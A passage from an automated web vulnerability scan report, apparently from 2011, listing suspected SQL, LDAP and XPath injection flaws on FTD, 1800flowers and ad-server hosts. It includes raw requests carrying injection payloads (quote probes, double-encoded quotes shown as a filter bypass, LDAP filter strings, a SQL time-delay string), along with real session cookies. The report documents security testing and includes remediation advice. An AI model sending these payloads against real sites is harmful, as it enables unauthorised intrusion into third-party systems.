<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 729991704</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /pics/counter.gif17406797'%20or%201%3d2--%20?markcode=351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; fsr.a=1304902828764; c1=%7B%22referrer_before_redirect%22%3A%22%22%2C%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123191
Date: Mon, 09 May 2011 01:08:34 GMT
X-Varnish: 540338930
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.24. http://xcdn.xgraph.net/17572/ai/xg.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://xcdn.xgraph.net
Path:   /17572/ai/xg.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /17572%2527/ai/xg.gif?pid=17572&sid=12001&type=ai&pcid=home HTTP/1.1
Host: xcdn.xgraph.net
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _xgcid=8C581B03B202A0310D45F935B233EBC0; _xguid=5AB157F7D0512CDEC732624704EA9852; _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html;charset=utf-8
Server: Apache-Coyote/1.1
Content-Length: 1538
Expires: Mon, 09 May 2011 01:01:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 01:01:06 GMT
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"

<html><head><title>Apache Tomcat/6.0.18 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
</b> Exception report</p>
...[SNIP]...
<pre>java.lang.IllegalStateException
   org.apache.catalina.connector.ResponseFacade.sendRedirect(ResponseFacade.java:435)
   net.netedge.beacon.BeaconServer.deliverAudiencePlacementGif(BeaconServer.java:810)
   net.netedge.beaco
...[SNIP]...
<u>The full stack trace of the root cause is available in the Apache Tomcat/6.0.18 logs.</u>
...[SNIP]...

Request 2

GET /17572%2527%2527/ai/xg.gif?pid=17572&sid=12001&type=ai&pcid=home HTTP/1.1
Host: xcdn.xgraph.net
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _xgcid=8C581B03B202A0310D45F935B233EBC0; _xguid=5AB157F7D0512CDEC732624704EA9852; _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2

Response 2

HTTP/1.1 302 Moved Temporarily
Location: http://ib.adnxs.com/seg?add=108023
Server: Apache-Coyote/1.1
Content-Length: 0
Expires: Mon, 09 May 2011 01:01:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 01:01:06 GMT
Connection: close
Set-Cookie: _push4xgat=1304902866869; Domain=.xgraph.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _mpush=D82FE5FA7F5F8A72D371134E46D9833; Domain=.xgraph.net; Expires=Thu, 08-May-2014 01:01:06 GMT; Path=/
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"


2. LDAP injection  previous  next
There are 2 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://blooms.1800flowers.com/cm [ci parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blooms.1800flowers.com
Path:   /cm

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 14e1fc02a2bff0a1)(sn=* and 14e1fc02a2bff0a1)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /cm?ci=14e1fc02a2bff0a1)(sn=*&st=1304902848067&vn1=4.8.3H&ec=utf-8&vn2=e4.0&pi=w-Welcome%20Page&ul=http%3A%2F%2Fww30.1800flowers.com%2F&tid=6&cg=w&rnd=1304912507230&pc=Y&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java(TM)%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5&cvdone=p HTTP/1.1
Host: blooms.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; CoreID6=70101304902850161284526; TestSess3=70101304902850161284526

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:01:09 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 14e1fc02a2bff0a1)(sn=*_login=1304902869001684455414e1fc02a2bff0a1)(sn=*; path=/
Set-Cookie: 14e1fc02a2bff0a1)(sn=*_reset=1304902869;path=/
Expires: Sun, 08 May 2011 07:01:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /cm?ci=14e1fc02a2bff0a1)!(sn=*&st=1304902848067&vn1=4.8.3H&ec=utf-8&vn2=e4.0&pi=w-Welcome%20Page&ul=http%3A%2F%2Fww30.1800flowers.com%2F&tid=6&cg=w&rnd=1304912507230&pc=Y&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java(TM)%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5&cvdone=p HTTP/1.1
Host: blooms.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; CoreID6=70101304902850161284526; TestSess3=70101304902850161284526

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:01:09 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 14e1fc02a2bff0a1)!(sn=*_login=1304902869001684455414e1fc02a2bff0a1)!(sn=*; path=/
Set-Cookie: 14e1fc02a2bff0a1)!(sn=*_reset=1304902869;path=/
Expires: Sun, 08 May 2011 07:01:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

2.2. http://www.ftd.com/ [TLTSID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /

Issue detail

The TLTSID cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the TLTSID cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=*)(sn=*; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902822159

Response 1

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:02:27 GMT
X-Varnish: 869413438 869395927
Age: 335
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136169


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<script type="text/javascript" language="javascript"> <!-- jQuery(document).ready( function(){ jQuery.getScript("http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-analytics-0eb7e.js"); jQuery.getScript("http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-trigger.js"); } ); //--> </script> <link rel="canonical" href="http://www.ftd.com" />    <script language="javascript" type="text/javascript">
       <!--
       try {
       setCookie('markcode', '351', '', '/', cookie_domain);
       } catch(e) {
           errAlert(e, 'setting markcode cookie in template');
       }
       //-->
       </script>
   
<script type="text/javascript">
<!--//
   var _traffic_dist = '{}';
           try {
               if ( markcode == '350'
                   || markcode == '514'
                   || markcode == '522'
                   || markcode == '528'
                   || markcode == '552'
                   || markcode == '558') {
                   var _sticky_markcodes = '{}';
                   stickyMarkcodeRedirect(_sticky_markcodes, _traffic_dist, 'http://www.ftd.com',1, '', '');
                   } else {
trafficDistribution(_traffic_dist, 'http://www.ftd.com', '', 1, '');
                   }
           } catch(e) {
               errAlert(e, 'trafficDistribution call');
           }
//-->
</script>


   
   <script language="javascript" type="text/javascript">
   <!--
   try {
       } catch(e) {
       errAlert(e, 'cobrand protected site check');
   }
   //-->
   </script>

<!-- start abandon popup code -->
   
<script language='javascript'>
<!--
   var showPopup = true;
   var Yaxis = 0;
   var blurred = false;
   var scart_unloadPopup_override = false;

   var isIE = (navigator.appName.indexOf("Microsoft") != -1);
   var isNav = (navigator.appName.indexOf("Netscape") != -1);
   var isFirefox = (navigator.userAgent.indexOf("Firefox") != -1);

   function unloadPopup(ev) {

/* If we are coming from the empty shopcart page. Thus, if our cart is empty.
           // Then don't show any popups.
           */

        if (scart_unloadPopup_override) {
            return 0;
           }

           var range = screen.height - document.body.offsetHeight;
           if (isIE) {
               ev = window.event;
           }

// kludge
if(!ev
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=*)!(sn=*; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902822159

Response 2

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:02:28 GMT
X-Varnish: 729971806 729949891
Age: 416
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134961


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<script type="text/javascript" language="javascript">
<!--
jQuery(document).ready(
function(){
jQuery.getScript("http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-analytics-0eb7e.js");
jQuery.getScript("http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-trigger.js");
}
);
//-->
</script> <link rel="canonical" href="http://www.ftd.com" />    <script language="javascript" type="text/javascript">
       <!--
       try {
       setCookie('markcode', '351', '', '/', cookie_domain);
       } catch(e) {
           errAlert(e, 'setting markcode cookie in template');
       }
       //-->
       </script>
   
<script type="text/javascript">
<!--//
   var _traffic_dist = '{}';
           try {
               if ( markcode == '350'
                   || markcode == '514'
                   || markcode == '522'
                   || markcode == '528'
                   || markcode == '552'
                   || markcode == '558') {
                   var _sticky_markcodes = '{}';
                   stickyMarkcodeRedirect(_sticky_markcodes, _traffic_dist, 'http://www.ftd.com',1, '', '');
                   } else {
trafficDistribution(_traffic_dist, 'http://www.ftd.com', '', 1, '');
                   }
           } catch(e) {
               errAlert(e, 'trafficDistribution call');
           }
//-->
</script>


   
   <script language="javascript" type="text/javascript">
   <!--
   try {
       } catch(e) {
       errAlert(e, 'cobrand protected site check');
   }
   //-->
   </script>

<!-- start abandon popup code -->
   
<script language='javascript'>
<!--
   var showPopup = true;
   var Yaxis = 0;
   var blurred = false;
   var scart_unloadPopup_override = false;

   var isIE = (navigator.appName.indexOf("Microsoft") != -1);
   var isNav = (navigator.appName.indexOf("Netscape") != -1);
   var isFirefox = (navigator.userAgent.indexOf("Firefox") != -1);

   function unloadPopup(ev) {

/* If we are coming from the empty shopcart page. Thus, if our cart is empty.
           // Then don't show any popups.
           */

        if (scart_unloadPopup_override) {
            return 0;
           }

           var range = screen.height - document.body.offsetHeight;
           if (isIE) {
               ev = window.event;
           }

// kludge
if(!ev
...[SNIP]...

3. XPath injection  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The NETID01 cookie appears to be vulnerable to XPath injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the NETID01 cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2',0)waitfor%20delay'0%3a0%3a20'--; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsiPus_aQJL="MLsXrlcNJj5noAC3RjxwrYCq5maHIXqV3bcut8jbjWMvRZsh039NS3Rk1DZ9FWcoweu30/kjxwVsyPDJfdB85DH9528gOB025UpRMepjnWmU5D8TIKUOcYbjUmShQ76UQ8O2Id1QrZKunr/oSaJPGUD1M2FfXarUHY3vg8ahPcCT3+YklIOYYWeOEs39aYwMH1Oyzh1cKZm6xWlsnVQK5XeKBwp21ZZle9CNzTsixFNNBKikWDt9n8zOQLOr2R52VBJU62U2bbxqnBQOF3XxuZopXc4sH3ZB08xsgmPeROBLf/pw2JM4T3NBA05x3I7F7WbAB0dj8okxKlhf6fEgxEAZUbMqj6JGIl7P5CAOGFhnHbvUKII41lYc0UedLRqTrY9QebpHRhrHwF3JXBfRoX1F7IMaWwNeWtqQQPBmAEJqR7mpbUrQY5Up8y7EjtHaDOlM3vgpaWsAYiPLvByGKWPmS09u1hcRmQmwQx5N2i7SWd1s9xtLLuXK6F+6bv2iZ8qFE71HT1Kkl+hS/Lg8ZUDNNMYrZPbgIaodojTtwp2b3LGlPywHAt7VDW/DAZuseSIyU4XW5eFPyz1Y6yrhpERI2Vik8hEbsQ8B8v87bEW13Rt13SX+mcaYE5siAUoco0Vq0+dX7hBHmJpHm33cECAnbFJyK50UHkwzt+c2nKU6KGuxY/oigNYJTV/sTm1adr+u7qtftuRwvDTeycarJ5BVmeTth8ruRZ1LgSNT/fpZx8Q4MvMQduiArZ4nRHmKTuHSvs2hGnE7UjfV+u2IOo9ma1WP/A=="; rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkjytG2HRpKcZ9iWeqPjy9kUWtl6xHCau2KMfgIXcPB8e/BpyfjtTtphAROxiuC83s+lEsRUrjgTlU1Q6ETbocY99WQN8dgTYd2TIldE82taHLaxy+Nydj7bjxqRSEzydoNKcidj8e3cwbw247cKkh0bvF6cW05IwoxL3mn8eGwNjtE8wBzFJ246UcorTvpQmlUzFWkSAdzpSiAiPPsJIE8lbllqVolddNGM9UughUMVmJRRI4QxwiFiwtc6KIkleGTyQORbnreQFdhoy9tIXJDzDUrzQQPFg53TtcFU0IzSRyZT7Ysrwwl1bCknBlQyPjhUJ76l2w0sAMYL8wdNz8+XZcRcYKvvD/UrCKooUt/aj0R6J70YEugNGsaI/NdjyO0otwfzNbegXYLqm4kbsRDLCOaFswANa5kumj+Myz7WFxFbCzByPlnMLG/iRprYhnnkwcpoUb94vjivtXsRNU8sY+9nJ/GyK0btkNncXgdCWK6F6Oq130DYl7qVO7toWR/7nBkQRQIHLYme9RaVkdGxQWzXlbDG+28P2rHEEKz1Jjq3MinipUFDb/X+skn0RAc5T2sv30M4M6SF5um2GeWtPGlm5/Kb7BBThW/rN4hbbJoIkTzsbd8cjyEyF0/6eY8Ql2WYO/ugwtD3KZKjg5FVoYYefZZL5FOyh5daP5P/acL+xvjHz+q/GKm+7UEbKgyi9riSc6BmVdwLpaoKChjgmndfydm9Rp55qJhAVzniaZx4ZfHgIJVo9ZqKvelViCz7jBcU+V22aO+QATsHM3O7khIxKxUpkTaNd2kuV2SDDKynS7pV755LqyKqSMIL9wDkqmG7I+PrM991cy7UOrI9CvhRsR0dGASBwDlIzEsz74PHZLjOOmhUndtuC+D9t3Pq9su4Qx5Gs+t+I1W2txXTMTAcv2+R94m2kL+BDy7SPgGZGE0LncHJN7qYordxYyuPDkLDO+RTaY+dG9ss66V7iVeW1Vpey8S0+SwK+SzonThNqM/B2m/bV6ZSXYt/prvJB/MoIZP7SVL30KjWZ5/nCFvqlj310LdQdx0sQ7a5cozfA89Wdmx6jAkGQrp47QDxo74bzIxU7oFU3eB48wpYTTqzPon/N/QOCsyy2tlb0vJptzVJDknJSV4Q5JHz84YjU8xY+F+7133qycHPNZitpdKfZe0t1RvmPf+XiCaa8BsDly/gBuN8TvoXnO8CAEwaesRAiFwcVqRagT7jCCmYzHi3EpHSIU6iFVXHlFHEhbdShbrC6g1B1Dr34GmQRkEjan4C1Evhax4yYJfFg/As+UsUZxBW0pXt5DzJCs/6I4Jli5U0q36mqAAXwqUxTeVjFtUsmZcR5liY8B3SY9pZ48EVHSp+luF/CLoxOj2+gMyXe3zIStYnrdo0U="; 